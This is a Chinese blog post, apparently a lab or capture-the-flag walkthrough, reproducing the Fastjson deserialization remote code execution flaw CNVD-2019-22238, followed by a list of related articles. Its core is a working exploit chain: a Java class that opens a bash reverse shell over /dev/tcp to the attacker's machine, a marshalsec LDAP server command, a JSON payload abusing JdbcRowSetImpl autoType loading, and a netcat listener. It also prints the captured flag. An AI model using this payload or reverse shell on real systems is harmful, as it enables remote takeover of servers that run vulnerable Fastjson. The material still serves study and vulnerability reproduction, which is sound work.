CNVD-2019-22238——fastjson 代码执行

已于 2023-09-24 14:18:42 修改
阅读量152 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 java 安全 web安全
于 2023-09-23 20:08:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cardistry12138/article/details/133215953
版权

在这里插入图片描述

将Shell.java编译后放在vps上

import java.lang.Runtime;
import java.lang.Process;

public class Shell {

    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash", "-c", "bash -i >& /dev/tcp/kail-ip/8888 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {

        }
    }
}

vps执行下列命令

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://VPS-IP/#Shell PORT

使用burp发送,注意发送数据格式:Content-Type: application/json
POC:

{
 "b":{
 "@type":"com.sun.rowset.JdbcRowSetImpl",
 "dataSourceName":"ldap://VPS-IP:PORT/Shell",
 "autoCommit":true
 }
}

kali上开启监听,接收反弹shell

nc -lvnp 8888

在这里插入图片描述

得到flag

flag-{bmh212b89ac-cbf2-41bd-be40-d32b757df8f6}
c0rdXy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Fastjson远程代码执行漏洞(CNVD-2019-22238) 漏洞复现
Boom!脑洞大爆炸的博客
07-07 598
Fastjson远程代码执行漏洞(CNVD-2019-22238) 漏洞复现
fastjson CNVD-2019-22238 远程代码执行漏洞
读书 买花 长大
05-19 395
CNVD-2019-22238
Fastjson<1.2.48远程代码执行漏洞(CNVD-2019-22238
qq_40646572的博客
05-08 644
fastjson在对 JSON 字符串进行反序列化的时候,会读取 @type 的内容,试图把 JSON 内容反序列化成这个对象,并且会调用这个类的set方法, 利用这个特性,构造一个 JSON 字符串,并且使 用 @type 反序列化一个自己想要使用的攻击类。com.sun.rowset.JdbcRowSetImpl就是一个支持调用rmi功能的类。因此可以使用com.sun.rowset.JdbcRowSetImpl类进行远程调用exp。
CNVD-2019-22238 Fastjson 1.2.47 反序列化复现
weixin_45260839的博客
08-12 698
CNVD-2019-22238 Fastjson 1.2.47 反序列化复现
Fastjson<=1.2.47-RCE反序列化漏洞(CNVD201922238)保姆级教程
精品博客,你值得一看~
08-10 450
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其 次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件 开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流 程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也 就是通常所指的“Gadget”),则会造成一些严重的安全问题。
CNVD-2019-34241 SQL注入.MD
03-20
CNVD-2019-34241 SQL注入.MD
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更...
CNVD-2021-17369 smartweb管理系统管理员密码泄露.md
04-11
CNVD-2021-17369 smartweb管理系统管理员密码泄露
CNVD-C-2019-48814:CNVD-C-2019-48814 Weblogic wls9_async_response反序列化利用工具
03-16
CNVD-C-2019-48814
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
cnvd_2019_22238
qq_59350385的博客
07-12 462
Fastjson 是Alibaba的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。相信利用过Fastjson漏洞的XDM都知道,该漏洞利用需要编写Java利用代码,然后在编译为class文件,在通过rmi/ladp等远程加载实现漏洞利用url:Vulfocus 漏洞威胁分析平台 本地需要安装java环境,启动JNDI-Injection-Exploit-1.0-SNAPSHOT-all
Fastjson反序列化和致远OAFastjson漏洞
maverickpig的博客
07-19 6927
Fastjson反序列化和致远OAFastjson漏洞
Fastjson漏洞学习——CNVD-2019-22238复现
记录并分享学习安全的知识点..
05-09 1001
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、概述 Fastjson是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。它还可以用于将JSON字符串转换为等效的Java对象,fastjson爆出多个反序列化远程命令执行漏洞,攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 二、影响版本 Fastjson < 1.2.68 ...
fastjson-1.2.24-rce(CVE-2017-18349)&fastjson-1.2.47-rce(CNVD-2019-22238)
最新发布
m0_62207170的博客
08-27 308
fastjson-1.2.24-rce(CVE-2017-18349)&fastjson-1.2.47-rce(CNVD-2019-22238)
Fastjson远程代码执行(CNVD-2019-22238)漏洞复现
慢就是快
12-31 4992
文章目录0x00 漏洞简介0x02 影响版本0x03 漏洞复现0x03 指纹识别0x04 注意事项0x05 漏洞修复 0x00 漏洞简介 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 0x01 漏洞详情 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象 Fastjson提供了autotype功能,允许用户在反序列化数据
Fastjson系列漏洞实战和总结
qq_50854662的博客
10-09 2819
Fastjson系列漏洞实战和总结
fastjson 代码执行CNVD-2017-02833)
qq_40646572的博客
05-08 854
fastjson
Fastjson 1.2.47 远程命令执行漏洞(CNVD-2019-22238
黑白的博客
11-23 1865
声明 好好学习,天天向上 漏洞描述 Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可
Fastjson <=1.2.47反序列化RCE漏洞(CNVD201922238
king丶
08-21 1488
**Fastjson <=1.2.47反序列化RCE漏洞(CNVD201922238) ** **一、漏洞描述 ** Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列 化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其 次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法
CNVD-2019-37364
06-01
CNVD-2019-37364是关于华为云容器服务存在的安全漏洞。该漏洞存在于华为云容器服务的Kubernetes集群中,攻击者可以通过构造恶意请求,绕过容器内部的网络隔离机制,实现对其他容器中的敏感信息的访问和攻击。 具体...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值